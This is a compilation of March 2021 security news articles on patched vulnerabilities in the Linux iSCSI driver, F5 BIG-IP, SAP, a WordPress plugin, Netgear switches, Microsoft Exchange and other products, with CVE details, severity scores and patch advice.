“Similar to the first vulnerability, an unprivileged user can craft netlink messages that specify buffer sizes that the driver fails to validate, causing a controllable out-of-bounds read.” continues the analysis. “There are multiple user-controlled values that are not validated, including the calculation of the size of the preceding header, allowing for a read of up to 8192 bytes at a controllable 32-bit offset from the original heap buffer.”
The three vulnerabilities can also lead to data leaks and could be exploited to trigger denial of service conditions.
“Due to the non-deterministic nature of heap overflows, the first vulnerability could be used as an unreliable, local DoS. However, when combined with an information leak, this vulnerability can be further exploited as a LPE that allows an attacker to escalate from an unprivileged user account to root. A separate information leak is not necessary, though, since this vulnerability can be used to leak kernel memory as well.” continues the analysis. “The second vulnerability (kernel pointer leak) is less impactful and could only serve as a potential information leak. Similarly, the third vulnerability (out-of-bounds read) is also limited to functioning as a potential information leak or even an unreliable local DoS.”
Attackers could exploit the vulnerabilities to bypass the security features
Kernel Address Space Layout Randomization (KASLR) bypass, Supervisor Mode
Execution Protection (SMEP), Supervisor Mode Access Prevention (SMAP), and
Kernel Page-Table Isolation (KPTI).
The flaws affect all Linux distributions
where the scsi_transport_iscsi kernel module has been loaded, but the good news
is that this isn’t a default setting.
“The vulnerabilities discussed above are from a very old driver in the Linux kernel. This driver became more visible due to a fairly new technology (RDMA) and default behavior based on compatibility instead of risk.” concludes the analysis. “The Linux kernel loads modules either because new hardware is detected or because a kernel function detects that a module is missing.”
Below the timeline for these flaws:
02/17/2021 – Notified Linux Security Team
02/17/2021 – Applied for and
received CVE numbers
03/07/2021 – Patches became available in mainline Linux
kernel
03/12/2021 – Public disclosure (NotQuite0DayFriday)
F5, CISA Warn of Critical BIG-IP and BIG-IQ RCE Bugs
12.3.2021 Vulnerebility Threatpost
The F5 flaws could affect the networking infrastructure for some of the largest tech and Fortune 500 companies – including Microsoft, Oracle and Facebook.
F5 Networks is warning users to patch four critical remote command execution (RCE) flaws in its BIG-IP and BIG-IQ enterprise networking infrastructure. If exploited, the flaws could allow attackers to take full control over a vulnerable system.
The company released an advisory, Wednesday, on seven bugs in total, with two others rated as high risk and one rated as medium risk, respectively. “We strongly encourage all customers to update their BIG-IP and BIG-IQ systems to a fixed version as soon as possible,” the company advised on its website.
The scenario is particularly urgent as F5 provides enterprise networking to some of the largest tech companies in the world, including Facebook, Microsoft and Oracle, as well as to a trove of Fortune 500 companies, including some of the world’s biggest financial institutions and ISPs.
The U.S. Cybersecurity and Infrastructure Agency (CISA) also urged companies using BIG-IP and BIG-IQ to fix two of the critical vulnerabilities, which are being tracked as CVE-2021-22986 and CVE-2021-22987.
The former, with a CVSS rating of 9.8, is an unauthenticated remote command execution vulnerability in the iControl REST interface, according to a detailed breakdown of the bugs in F5’s Knowledge Center. The latter, with a CVSS rating of 9.9, affects the infrastructure’s Traffic Management User Interface (TMUI), also referred to as the Configuration utility. When running in Appliance mode, the TMUI has an authenticated RCE vulnerability in undisclosed pages, according to F5.
The two other critically rated vulnerabilities are being tracked as CVE-2021-22991 and CVE-2021-22992. The first, with a CVSS score of 9.0, is a buffer overflow vulnerability that can be triggered when “undisclosed requests to a virtual server may be incorrectly handled by the Traffic Management Microkernel (TMM) URI normalization,” according to F5. This can result in a denial-of-service (DoS) attack, that, in some situations, “may theoretically allow bypass of URL based access control or remote code execution (RCE),” the company warned.
CVE-2021-22992 is also a buffer overflow bug with a CVSS rating of 9. This flaw can be triggered by “a malicious HTTP response to an Advanced WAF/BIG-IP ASM virtual server with Login Page configured in its policy,” according to F5. It also may allow for RCE and “complete system compromise” in some situations, the company warned.
The other three non-critical bugs being patched in F5’s update this week are CVE-2021-22988, CVE-2021-22989 and CVE-2021-22990.
CVE-2021-22988, with a CVSS score of 8.8, is an authenticated RCE that also affects TMUI. CVE-2021-22989, with a CVSS rating of 8.0, is another authenticated RCE that also affects TMUI in Appliance mode, this time when Advanced WAF or BIG-IP ASM are provisioned. And CVE-2021-2290, with a CVSS score of 6.6, is a similar but less dangerous vulnerability that exists in the same scenario, according to F5.
F5 is no stranger to critical bugs in its enterprise networking products. In July, the vendor and other security experts—including U.S. Cyber Command—urged companies to deploy an urgent patch for a critical RCE vulnerability in BIG-IP’s app delivery controllers that was being actively exploited by attackers to scrape credentials, launch malware and more. That bug, (CVE-2020-5902), had a CVSS rating of 10 out of 10. Moreover, a delay in patching at the time left systems exposed to the flaw for weeks after F5 released the fix.
F5 addresses critical vulnerabilities in BIG-IP and BIG-IQ
12.3.2021
Vulnerebility
Securityaffairs
Security firm F5 announced the availability of patches for seven vulnerabilities
in BIG-IP, four of which have been rated as “critical” severity.
BIG-IP
product family includes hardware, modularized software, and virtual appliances
that run the F5 TMOS operating system and provides load balancing, firewall,
access control, threat protection capabilities.
The vendor has released security updates for seven vulnerabilities in BIG-IP
products, four have been rated as critical severity, two other issues have been
rated high and one medium severity.
“As part of our ongoing security
vulnerability management practices, today F5 announced several vulnerabilities
and fixes for both BIG-IP and BIG-IQ.” states F5. “The bottom line is that they
affect all BIG-IP and BIG-IQ customers and instances—we urge all customers to
update their BIG-IP and BIG-IQ deployments to the fixed versions as soon as
possible.”
The critical vulnerabilities, tracked as CVE-2021-22986, CVE-2021-22987, CVE-2021-22991, CVE-2021-22992, affect BIG-IP versions 11.6 or 12.x and newer. The CVE-2021-22986 flaw also affects BIG-IQ versions 6.x and 7.x.
The most severe flaw is remote code execution vulnerability, tracked as CVE-2021-22987, that resides in the the Traffic Management User Interface (TMUI). The vulnerability received a CVSS score of 9.9.
“When running in Appliance mode, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has an authenticated remote command execution vulnerability in undisclosed pages.” reads the advisory published by F5. “This vulnerability allows authenticated users with network access to the Configuration utility, through the BIG-IP management port, or self IP addresses, to execute arbitrary system commands, create or delete files, or disable services. This vulnerability can only be exploited through the control plane and cannot be exploited through the data plane. Exploitation can lead to complete system compromise and breakout of Appliance mode.”
Another critical flaw, tracked as CVE-2021-22986 is an unauthenticated remote
command execution vulnerability that resides in the iControl REST interface. The
flaw received a CVSS score of 9.8 and affects BIG-IP and BIG-IQ.
The
vulnerability could be exploited by unauthenticated attackers with network
access to the iControl REST interface, through the BIG-IP management interface
and self IP addresses, to execute arbitrary system commands, create or delete
files, and disable services.
“This vulnerability can only be exploited through the control plane and cannot
be exploited through the data plane. Exploitation can lead to complete system
compromise. The BIG-IP system in Appliance mode is also vulnerable.” reads the
advisory.
The two high severity flaw addressed by F5 are CVE-2021-22988 (CVSS
score of 8.8) and CVE-2021-22989 (CVSS score of 8.0), while the one rated as
medium risk is tracked as CVE-2021-22990 (CVSS score of 6.6).
F5 also addressed 14 additional vulnerabilities, five high severity and nine medium risk.
SAP Stomps Out Critical RCE Flaw in Manufacturing Software
11.3.2021
Vulnerebility
Threatpost
The remote code
execution flaw could allow attackers to deploy malware, modify network
configurations and view databases.
Enterprise software giant SAP pushed out fixes for a critical-severity vulnerability in its real-time data monitoring software for manufacturing operations. If exploited, the flaw could allow an attacker to access SAP databases, infect end users with malware and modify network configurations.
The critical-bug fix was part of 18 security patches released by SAP addressing new vulnerabilities and updating previously released patches.
The two most critical fixes, which are newly released as part of the security update, included the vulnerability in SAP’s Manufacturing Integration and Intelligence (MII) application for synchronizing manufacturing operations, as well as one in SAP’s NetWeaver AS Java software stack.
“With 18 new and updated SAP Security Notes, SAP’s March Patch Day is slightly below the average amount of patches released in the first two months in 2021,” said researchers with Onapsis in a Wednesday analysis. “With SAP MII, SAP NetWeaver AS Java and SAP HANA, three different applications are affected this time by critical vulnerabilities (HotNews and High Priority).”
SAP MII Security Flaw: Remote Code Execution
The vulnerability in SAP MII
(CVE-2021-21480) is a code injection vulnerability, in which code is inserted
into the language of a targeted application and executed by the server-side
interpreter. The flaw has a CVSS score of 9.9 out of 10. Versions 15.1, 15.2,
15.3 and 15.4 are affected, according to SAP.
SAP MII is a NetWeaver AS Java-based platform, which allows for real-time monitoring of production and data analysis for insights into performance efficiency.
The flaw stems from a component of SAP MII called Self-Service Composition Environment (SSCE), which is utilized to design dashboards for real-time data analysis. These dashboards can be saved as a Java Server Pages (JSP) file. However, an attacker can remotely intercept a JSP request to the server, inject it with malicious code, and then forward it to the server.
“When such an infected dashboard is opened in production by a user having a minimum of authorizations, the malicious content gets executed, leading to remote code execution in the server,” said Onapsis researchers.
That could lead to various malicious attacks, including access to SAP databases and the ability to read, modify or erase records; pivoting to other servers; infecting end users with malware and modifying network configurations to potentially affect internal networks.
Researchers strongly recommends applying the corresponding patch as soon as possible.
“The patch will prevent dashboards from being saved as JSP files,” said Onapsis researchers. “Unfortunately, there is no more flexible solution available. If JSP files are required, customers should restrict access to the SSCE as much as possible and validate any JSP content manually before moving it to production.”
SAP NetWeaver AS Java Flaw
Another serious flaw exists in SAP NetWeaver AS
Java, versions 7.10, 7.11, 7.30, 7.31, 7.40 and 7.50. Specifically the
MigrationService component is affected in that it lacks authorization checks.
This flaw (CVE-2021-21481) ranks 9.6 on the CVSS scale, making it critical severity.
SAP NetWeaver AS Java is typically used internally for migrating applications between major releases for the AS Java engine.
“The missing authorization check might allow an unauthorized attacker to gain administrative privileges,” said researchers. “This could result in complete compromise of the system’s confidentiality, integrity and availability.”
Other Serious SAP Security Flaws
Beyond these two serious flaws, SAP also
fixed an authentication bypass (CVE-2021-21484) in SAP HANA (Version 2.0). It
also made updates to two previous security updates – including a missing
authentication check in SAP Solution Manager (from a security note released in
March 2020) and a security update for Google Chromium (from a security noted
released on April 2018). SAP did not give further details on the updates for
these security notes.
The fixes come after a February security update by SAP fixing a critical vulnerability in its Commerce platform for e-commerce businesses. If exploited, the flaw could allow for remote code execution that ultimately could compromise or disrupt the application.
The fixes also come during a busy Patch Tuesday week. Microsoft’s regularly scheduled March Patch Tuesday updates addressed 89 security vulnerabilities overall, including 14 critical flaws and 75 important-severity flaws.
Also released on Tuesday were Adobe’s security updates, addressing a cache of critical flaws, which, if exploited, could allow for arbitrary code execution on vulnerable Windows systems.
Cyberattackers Exploiting Critical WordPress Plugin Bug
11.3.2021
Vulnerebility
Threatpost
The security hole in the Plus Addons for Elementor plugin was used in active zero-day attacks prior to a patch being issued.
The Plus Addons for Elementor plugin for WordPress has a critical security vulnerability that attackers can exploit to quickly, easily and remotely take over a website. First reported as a zero-day bug, researchers said it’s being actively attacked in the wild.
The plugin, which has more than 30,000 active installations according to its developer, allows site owners to create various user-facing widgets for their websites, including user logins and registration forms that can be added to an Elementor page. Elementor is a site-building tool for WordPress.
The bug (CVE-2021-24175) is a privilege-escalation and authentication-bypass issue that exists in this registration form function of the Plus Addons for Elementor. It rates 9.8 on the CVSS vulnerability scale, making it critical in severity.
“Unfortunately, this functionality was improperly configured and allowed attackers to register as an administrative user, or to log in as an existing administrative user,” according to researchers at Wordfence, in a posting this week. They added that it arises from broken session management, but didn’t provide further technical details.
Exploited as a Zero-Day Bug
The bug was first reported to WPScan by Seravo, a
web-hosting company, as a zero-day under active attack by cybercriminals.
“The plugin is being actively exploited to by malicious actors to bypass authentication, allowing unauthenticated users to log in as any user (including admin) by just providing the related username, as well as create accounts with arbitrary roles, such as admin,” according to WPScan’s overview.
As for how cybercriminals are using the exploit in the wild, Wordfence noted that indicators of compromise point to attackers creating privileged accounts and then using them to further compromise the site.
“We believe that attackers are adding user accounts with usernames as the registered email address based on how the vulnerability creates user accounts, and in some cases installing a malicious plugin labeled ‘wpstaff,'” researchers said.
Worryingly, they added that the vulnerability can still be exploited even if there’s no active login or registration page that was created with the plugin, and even if registration and logins are suspended or disabled.
“This means that any site running this plugin is vulnerable to compromise,” according to the Wordfence posting.
How to Fix the Plus Addons for Elementor Security Vulnerability
The
vulnerability was reported on Monday, and fully patched a day later. Site admins
should upgrade to version 4.1.7 of The Plus Addons for Elementor to avoid
compromise, and they should check for “any unexpected administrative users or
plugins you did not install,” according to Wordfence. The Plus Addons for
Elementor Lite does not contain the same vulnerability, the firm added.
“If you are using The Plus Addons for Elementor plugin, we strongly recommend that you deactivate and remove the plugin completely until this vulnerability is patched,” researchers said. “If the free version will suffice for your needs, you can switch to that version for the time being.”
WordPress Plugin Problems Persist
WordPress plugins continue to offer an
attractive avenue of attack for cybercriminals.
In January, researchers warned of two vulnerabilities (one critical) in a WordPress plugin called Orbit Fox that could allow attackers to inject malicious code into vulnerable websites and/or take control of a website.
Also that month, a plugin called PopUp Builder, used by WordPress websites for building pop-up ads for newsletter subscriptions, was found to have a vulnerability could be exploited by attackers to send out newsletters with custom content, or to delete or import newsletter subscribers.
And in February, an unpatched, stored cross-site scripting (XSS) security bug was found to potentially affect 50,000 Contact Form 7 Style plugin users.
A flaw in The Plus Addons for Elementor WordPress plugin allows sites takeover
11.3.2021
Vulnerebility
Securityaffairs
Researchers from the Wordfence team found a critical vulnerability in The Plus
Addons for Elementor WordPress plugin that could be exploited to take over a
website.
Researchers at the Wordfence team of the security firm Defiant have
spotted a critical flaw in The Plus Addons for Elementor WordPress plugin that
could be exploited by attackers to gain administrative privileges to a website
and take over it. The researchers also warn that the zero-day vulnerability has
been exploited in the wild.
The Plus Addons for Elementor allows to add several widgets to the popular WordPress website builder Elementor, it has more than 30,000 installations to date.
Wordfence researchers discovered the vulnerability in one of the widgets that
the plugin allows to add, it allows designers and developers to insert user
login and registration forms to Elementor pages.
The flaw allows attackers to
create new administrative user accounts on vulnerable sites when the user
registration is enabled, and log in as other administrative users. The
vulnerability was reported to WPScan by the Seravo hosting company.
“The flaw
makes it possible for attackers to create new administrative user accounts on
vulnerable sites, if user registration is enabled, along with logging in as
other administrative users.” reads the post published by WordFence.
The
vulnerability doesn’t affect the free version of the plugin, The Plus Addons for
Elementor Lite.
The development team behind the plugin has fully patched the flaw on March 9th
with the release of version 4.1.7. Users are highly recommended to update to
this version immediately to prevent attacks.
At the time of this writing,
experts have very limited indicators of compromise. Attackers are adding user
accounts with usernames as the registered email address based on how the
vulnerability creates user accounts, in some cases the experts observed
attackers installing a malicious plugin labeled wpstaff.
“We strongly recommend checking your site for any unexpected administrative users or plugins you did not install.” continues the post.
The researchers pointed out that threat actors in the wild are actively exploiting the vulnerability.
The researchers also created a proof-of-concept exploit code for this vulnerability.
F5 Patches Four Critical Bugs in Big-IP Suite
11.3.2021
Vulnerebility
Securityweek
Application services and network delivery firm F5 on Wednesday announced the release of patches for seven related vulnerabilities in BIG-IP, including four with a "critical" severity rating.
The BIG-IP software powers a wide range of products, including hardware, modularized software, and virtual appliances, which run on the TMOS architecture and provide customers with modules that support load balancing, firewall, access control, threat protection, and more.
On March 10, F5 announced the release of fixes for multiple vulnerabilities in BIG-IP, some of which also impact BIG-IQ, a framework designed to help with the management of BIG-IP devices and application services.
Four critical vulnerabilities in BIG-IP were announced, including one impacting BIG-IQ, along with seven high severity vulnerabilities and ten medium severity. However, the critical flaws are related to two high risk and one medium bug only.
“The bottom line is that they affect all BIG-IP and BIG-IQ customers and instances—we urge all customers to update their BIG-IP and BIG-IQ deployments to the fixed versions as soon as possible,” F5 says.
The most important of the four critical bugs is CVE-2021-22986 (CVSS score of 9.8), an unauthenticated remote command execution vulnerability in the iControl REST interface, which impacts both BIG-IP and BIG-IQ, F5 says.
An unauthenticated attacker that has network access to the iControl REST could execute arbitrary system commands, manipulate files, or disable services. Exploitation is only possible through the control plane and could lead to complete system compromise, F5 explains.
Tracked as CVE-2021-22987 (CVSS score of 9.9), the second critical bug affects the Traffic Management User Interface (TMUI) -- which is also known as the Configuration utility -- when running in Appliance mode, and could be abused by an authenticated remote attacker for command execution and complete system compromise.
Two high severity -- CVE-2021-22988 (CVSS score: 8.8) and CVE-2021-22989 (CVSS score: 8.0) -- and one medium risk -- CVE-2021-22990 (CVSS score: 6.6) -- authenticated remote command execution flaws were also addressed in the TMUI. Tracked as CVE-2021-22991 and featuring a CVSS score of 9.0, the third critical vulnerability patched today resides in the incorrect handling of undisclosed requests to a virtual server, which could trigger a buffer overflow, leading to denial of service, or even bypass of URL-based access control and even remote code execution (RCE).
Also featuring a CVSS score of 9.0, the fourth critical bug is CVE-2021-22992, a buffer overflow that could be triggered through malicious HTTP responses to an Advanced WAF/BIG-IP ASM virtual server. Exploitation could lead to denial of service or remote code execution, thus resulting in complete system compromise, F5 explains.
F5 also announced 14 unrelated CVEs (five high severity and nine medium risk), but did not share details on them alongside the aforementioned seven vulnerabilities.
“We strongly recommend that all customers update their BIG-IP and BIG-IQ deployments to a fixed version as soon as possible—this is the only way to fully address the vulnerabilities,” F5 added.
SAP Patches Critical Flaws in MII, NetWeaver Products
11.3.2021
Vulnerebility
Securityweek
SAP's March 2021 Security Patch Day updates include 9 new security notes, including two for critical vulnerabilities affecting the company's NetWeaver Application Server (AS) and Manufacturing Integration and Intelligence (MII) products.
This month’s set of patches also includes 4 updates to previously released Patch Day security notes, including updates for two notes rated Hot News (CVSS score 10), which address a missing authorization check in Solution Manager (CVE-2020-6207) and deliver the latest patches for the Chromium browser in Business Client.
The most severe of the newly released security notes addresses a code injection vulnerability in SAP MII. Tracked as CVE-2021-21480, the vulnerability features a CVSS score of 9.9.
Based on NetWeaver AS Java, SAP MII provides monitoring and data analysis capabilities, capturing data from production machinery and providing real-time information on performance and efficiency.
The critical vulnerability was identified in the Self-Service Composition Environment (SSCE) component, which allows the creation of dashboards (via drag-and-drop) that can be saved as JSP files. The flaw allows an attacker to inject malicious JSP code in a request to the server, which would then be executed when the infected dashboard is opened.
Exploitation of the bug would allow an attacker to access SAP databases and tamper with records, move laterally to other servers, inject malware, and modify network configurations to potentially compromise internal networks.
The second Hot News security note that SAP released on Tuesday addresses a missing authorization check in the Migration Service of NetWeaver AS Java (CVE-2021-21481, CVSS score 9.6).
Used internally to migrate applications between J2EE Engine releases, the service could be abused to gain administrative privileges and potentially fully compromise the vulnerable system. The fix for this vulnerability requires a system restart, Onapsis, a firm that specializes in securing SAP applications, explains.
This month, SAP released a single high-severity security note, to address a possible authentication bypass in HANA LDAP scenarios (CVE-2021-21484, CVSS score 7.7). Successful exploitation requires that the LDAP directory server enables unauthenticated bind and that SAP HANA has been configured to automatically create users and allow access based on LDAP authentication.
All of the remaining security notes included in the March 2021 Security Patch Day are rated medium severity. They address missing authorization checks, an insecure deserialization issue, a reverse TabNabbing vulnerability, improper input validation, and a server-side request forgery bug.
Unpatched Flaws in Netgear Business Switches Expose Organizations to Attacks
11.3.2021
Vulnerebility
Securityweek
Security researchers have identified multiple vulnerabilities in ProSAFE Plus JGS516PE and GS116Ev2 business switches from Netgear, the most severe of which could allow a remote, unauthenticated attacker to execute arbitrary code.
A total of 15 vulnerabilities affecting Netgear switches that use the ProSAFE Plus configuration utility were found to expose users to various risks, according to researchers with IT security firm NCC Group.
The most important of these bugs is CVE-2020-26919, an unauthenticated remote code execution flaw rated critical severity (CVSS score of 9.8).
Affecting firmware versions prior to 2.6.0.43, the bug is related to the internal management web application not implementing the correct access controls, which could allow attackers to bypass authentication and run code with the privileges of the administrator.
“Due to the ability of execute system commands through the ‘debug’ web sections, a successful exploitation of this vulnerability can lead to remote code execution on the affected device,” NCC Group notes.
The researchers also discovered that the Netgear Switch Discovery Protocol (NSDP), a network protocol functioning as a discovery method that also allows for switch management, fails to properly handle authentication packages, thus leading to authentication bypasses (CVE-2020-35231, CVSS score of 8.8).
An attacker able to exploit this vulnerability “could execute any management actions in the device, including wiping the configuration by executing a factory restoration,” the researchers say.
NCC Group says that Netgear has informed them that the NSDP has reached end of life (EOL) and that none of the issues identified in it will be addressed. Users are advised to disable the remote management feature.
“Netgear reported that most of the vulnerabilities affecting the NSDP protocol were known due to end-of-life years ago and it is still enabled for legacy reasons, for customers who preferred to use Prosafe Plus. Furthermore, we were informed that, due to hardware limitations, it is not possible to implement many of the standard encryption protocols, such as those needed to implement HTTPS,” NCC Group notes.
The researchers also found issues with the firmware update mechanism on the vulnerable switches. One of them, CVE-2020-35220 (CVSS score of 8.3), could allow attackers to upload custom firmware files without administrative rights.
The second issue (CVE-2020-35232, CVSS score of 8.1) resides in the improper implementation of internal checks, which could allow attackers to craft firmware files that could “overwrite the entire memory with custom code.”
Other high-severity vulnerabilities in Netgear’s switches could lead to denial of service (CVE-2020-35224, CVSS score 8.1), or could allow an attacker to generate valid passwords (CVE-2020-35221, CVSS score 7.5) or perform requests using a single authenticated packet (CVE-2020-35229, CVSS score 7.5).
A stored XSS issue in language settings (CVE-2020-35228, CVSS score 7.2) could be abused to inject JavaScript code that would be executed on all webpages, while a buffer overflow (CVE-2020-35227, CVSS score 7.2) could be abused to cause a system reboot, among others.
Another vulnerability in the NSDP protocol, the researchers discovered, could be abused to retrieve the DHCP status without authentication, thus allowing remote users to configure the service, likely leading to denial of service (CVE-2020-35226, CVSS score 7.1).
The security researchers also identified a series of medium-severity flaws, such as unauthenticated access to switch configuration parameters (CVE-2020-35222), TFTP unexpected behavior (CVE-2020-35233), integer overflow instances (CVE-2020-35230), write command buffer overflows (CVE-2020-35225), and ineffective cross-site request forgery protections (CVE-2020-35223).
In December 2020, Netgear released firmware version 2.6.0.48, which includes patches for CVE-2020-35220, CVE-2020-35232, CVE-2020-35233, and other issues. The remaining issues won’t receive patches, the researchers say.
Critical Pre-Auth RCE Flaw Found in F5 Big-IP Platform — Patch ASAP!
11.3.2021
Vulnerebility
Thehackernews
Application security company F5 Networks on Wednesday published an advisory warning of four critical vulnerabilities impacting multiple products that could result in a denial of service (DoS) attack and even unauthenticated remote code execution on target networks.
The patches concern a total of seven related flaws (from CVE-2021-22986 through CVE-2021-22992), two of which were discovered and reported by Felix Wilhelm of Google Project Zero in December 2020.
The four critical flaws affect BIG-IP versions 11.6 or 12.x and newer, with a critical pre-auth remote code execution (CVE-2021-22986) also affecting BIG-IQ versions 6.x and 7.x. F5 said it's not aware of any public exploitation of these issues.
Successful exploitation of these vulnerabilities could lead to a full compromise of vulnerable systems, including the possibility of remote code execution as well as trigger a buffer overflow, leading to a DoS attack.
Urging customers to update their BIG-IP and BIG-IQ deployments to a fixed
version as soon as possible, F5 Networks' Kara Sprague said the "vulnerabilities
were discovered as a result of regular and continuous internal security testing
of our solutions and in partnership with respected third parties working through
F5's security program."
The vulnerabilities have been addressed in the following products:
BIG-IP versions: 16.0.1.1, 15.1.2.1, 14.1.4, 13.1.3.6, 12.1.5.3, and 11.6.5.3
BIG-IQ versions: 8.0.0, 7.1.0.3, and 7.0.0.2
Besides these flaws, Wednesday's
patches also include fixes for 14 other unrelated security issues.
The fixes are notable for the fact that it's the second time in as many years that F5 has revealed flaws that could allow remote code execution.
The latest update to BIG-IP software arrives less than a year after the company addressed a similar critical flaw (CVE-2020-5902) in early July 2020, with multiple hacking groups exploiting the bug to target unpatched devices, prompting the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to issue an alert cautioning of a "broad scanning activity for the presence of this vulnerability across federal departments and agencies."
"This bug is probably going to fly under the radar, but this is a much bigger deal than it looks because it says something is really really broken in the internal security process of F5 BIG-IP devices," said Matt "Pwn all the Things" Tait in a tweet.
Microsoft Ships Massive Security Patch Bundle
10.3.2021
Vulnerebility
Securityweek
It’s raining patches in the Microsoft Windows ecosystem.
The Redmond, Wash. software giant on Tuesday dropped a mega-batch of security updates with patches for a whopping 89 documented vulnerabilities, including one used in zero-day attacks against some in the white-hat hacker community.
This month’s Patch Tuesday whopper comes just one week after Microsoft scrambled out emergency fixes to provide cover for in-the-wild nation-state attacks targeting Exchange Server installations.
Microsoft has blamed those attacks on Chinese cyber-espionage actors operating from leased VPS (virtual private servers) in the United States. The APT group has hit tens of thousands of organizations around the world, including targeted sectors like defense contractors, policy think tanks, and NGOs.
Microsoft also provided cover for a separate Internet Explorer vulnerability (CVE-2021-26411) that was used by North Korean government-backed hackers to target security researchers in South Korea.
The IE zero-day (Internet Explorer, interestingly, remains widely deployed in South Korea, was flagged by security vendor ENKI in February alongside a warning about drive-by browser IE downloads. Security researchers at Kaspersky have linked the attacks to a sub-group under Lazarus, the infamous North Korean threat actor known for launching destructive malware and ransomware attacks across the globe.
In all, Microsoft documented 89 distinct vulnerabilities across a range of software and cloud-delivered products in its portfolio. The patches cover serious flaws in multiple Windows OS components, Office and Office Services and Web Apps, SharePoint Server, Visual Studio, Azure and Azure Sphere.
Microsoft slapped a critical rating on 14 of the 89 documented vulnerabilities, while 75 carry an “important” severity rating.
According to Microsoft, two of these bugs are listed as publicly known while five are listed as under active attack at the time of release.
As usual, TippingPoint ZDI has a comprehensive wrap-up of this month’s Microsoft patch release.
Adobe Patches Code Execution Flaws in Connect, Creative Cloud, Framemaker
10.3.2021
Vulnerebility
Securityweek
Adobe on Tuesday announced that it has patched critical code execution vulnerabilities in its Connect, Creative Cloud, and Framemaker products.
In the Creative Cloud desktop application, Adobe fixed three flaws rated critical, including arbitrary file overwrite and OS command injection issues that can lead to code execution, and an improper input validation issue that can be exploited for privilege escalation.
In its Connect product, the company addressed one critical input validation issue that can result in arbitrary code execution and three important-severity reflected cross-site scripting (XSS) flaws that can allow an attacker to execute arbitrary JavaScript code in the targeted user’s browser. XSS attacks typically require the victim to click on a specially crafted link.
In Framemaker, Adobe patched one critical out-of-bounds read vulnerability that can lead to code execution.
Adobe said it had found no evidence of exploitation for malicious purposes, and since all vulnerabilities have been assigned a priority rating of 3, the company likely does not expect them to ever be exploited in attacks.
The software giant has credited independent security researchers for most of the vulnerabilities fixed with these Patch Tuesday updates.
Adobe last month patched a Reader vulnerability that had been exploited in the wild, but no information has been made available on those attacks.
GitHub Informs Users of 'Potentially Serious' Authentication Bug
10.3.2021
Vulnerebility
Securityweek
GitHub on Monday informed users that it had discovered what it described as an “extremely rare, but potentially serious” security bug related to how some authenticated sessions were handled.
The Microsoft-owned software development platform said the issue was discovered on March 2 and an initial patch was rolled out on March 5. A second patch was released on March 8 and on the evening of the same day the company decided to invalidate all authenticated sessions to completely eliminate the possibility of exploitation.
The vulnerability, which GitHub said existed at various times between February 8 and March 5, was caused by a race condition that in extremely rare circumstances resulted in a user’s session being routed to the browser of a different authenticated user, providing this second user with a valid and authenticated session cookie for the first user’s account.
“It is important to note that this issue was not the result of compromised account passwords, SSH keys, or personal access tokens (PATs) and there is no evidence to suggest that this was the result of a compromise of any other GitHub systems,” noted Mike Hanley, GitHub’s recently appointed chief security officer. “Instead, this issue was due to the rare and isolated improper handling of authenticated sessions. Further, this issue could not be intentionally triggered or directed by a malicious user.”
Hanley said they learned about the issue as a result of an external report about anomalous behavior.
Less than 0.001% of authenticated sessions on GitHub.com were impacted and the company said there was no evidence that other products were affected.
“Out of an abundance of caution, and with a strong bias toward account security, we’ve invalidated all sessions on GitHub.com created prior to 12:03 UTC on March 8 to avoid even the remote possibility that undetected compromised sessions could still exist after the vulnerability was patched,” Hanley explained.
Microsoft releases IOC Detection Tool for Microsoft Exchange Server flaws
7.3.2021
Vulnerebility
Securityaffairs
After the disclosure of Microsoft Exchange zero-days, MS Exchange Server team
has released a script to determine if an install is vulnerable.
This week
Microsoft has released emergency out-of-band security updates that address four
zero-day issues (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and
CVE-2021-27065) in all supported MS Exchange versions that are actively
exploited in the wild.
In response to the disclosure, the US Cybersecurity and Infrastructure Security Agency (CISA) has issued the Emergency Directive 21-02 in response to the disclosure of zero-day vulnerabilities in Microsoft Exchange.
Microsoft revealed that at least one China-linked APT group, tracked as HAFNIUM, chained these vulnerabilities to access on-premises Exchange servers to access email accounts, and install backdoors to maintain access to victim environments.
The US CISA’s emergency directive orders federal agencies to urgently update or disconnect MS Exchange on-premises installs.
Researchers at the MS Exchange Server team have released a script that could be used by administrators to check if their installs are vulnerable to the recently disclosed vulnerabilities.
Microsoft released the tool as open-source on GitHub, it can be used to check
the status of Exchange servers.
“Formerly known as Test-Hafnium, this script
automates all four of the commands found in the Hafnium blog post.” states
Microsoft. “It also has a progress bar and some performance tweaks to make the
CVE-2021-26855 test run much faster.
Download the latest release here: Download Test-ProxyLogon.ps1
The most
typical usage of this script is to check all Exchange servers and save the
output,”
The script automates the tests for the four zero-day vulnerabilities in Microsoft Exchange Server.
“Microsoft has released an updated script that scans Exchange log files for indicators of compromise (IOCs) associated with the vulnerabilities disclosed on March 2, 2021.” states CISA.
“CISA is aware of widespread domestic and international exploitation of these vulnerabilities and strongly recommends organizations run the Test-ProxyLogon.ps1 script—as soon as possible—to help determine whether their systems are compromised. For additional information on the script, see Microsoft’s blog HAFNIUM targeting Exchange Servers with 0-day exploits.”
Microsoft Shares Additional Mitigations for Exchange Server Vulnerabilities
Under Attack
7.3.2021
Vulnerebility
Securityweek
Microsoft on Friday released alternative mitigation measures for organizations who have not been able to immediately apply emergency out-of-band patches released earlier this week that address vulnerabilities being exploited to siphon e-mail data from corporate Microsoft Exchange servers.
“These mitigations are not a remediation if your Exchange servers have already been compromised, nor are they full protection against attack,” Microsoft warned in a blog post. “We strongly recommend investigating your Exchange deployments using the hunting recommendations here to ensure that they have not been compromised. We recommend initiating an investigation in parallel with or after applying one of the following mitigation strategies.”
Microsoft also provided a nmap script to help customers discover vulnerable servers within their infrastructure.
Security researchers have warned that multiple cyber-espionage groups have been targeting vulnerable Exchange servers. Some reports suggest that 30,000 or more organizations may have been hacked via the Exchange security holes.
Analysts say that HAFNIUM, a state-sponsored hacking group operating out of China, has been on an an active hacking spree with a massive espionage campaign underway to siphon data from organizations globally.
“This is the real deal. If your organization runs an OWA server exposed to the internet, assume compromise between 02/26-03/03,” Ex-CISA Chief Chris Krebs tweeted. “Check for 8 character aspx files in C:\\inetpub\wwwroot\aspnet_client\system_web\. If you get a hit on that search, you’re now in incident response mode."
The U.S. Cybersecurity and Infrastructure Security (CISA) also issued an alert Friday, urging organizations to upgrade their on-premises Microsoft Exchange servers to the latest supported version.
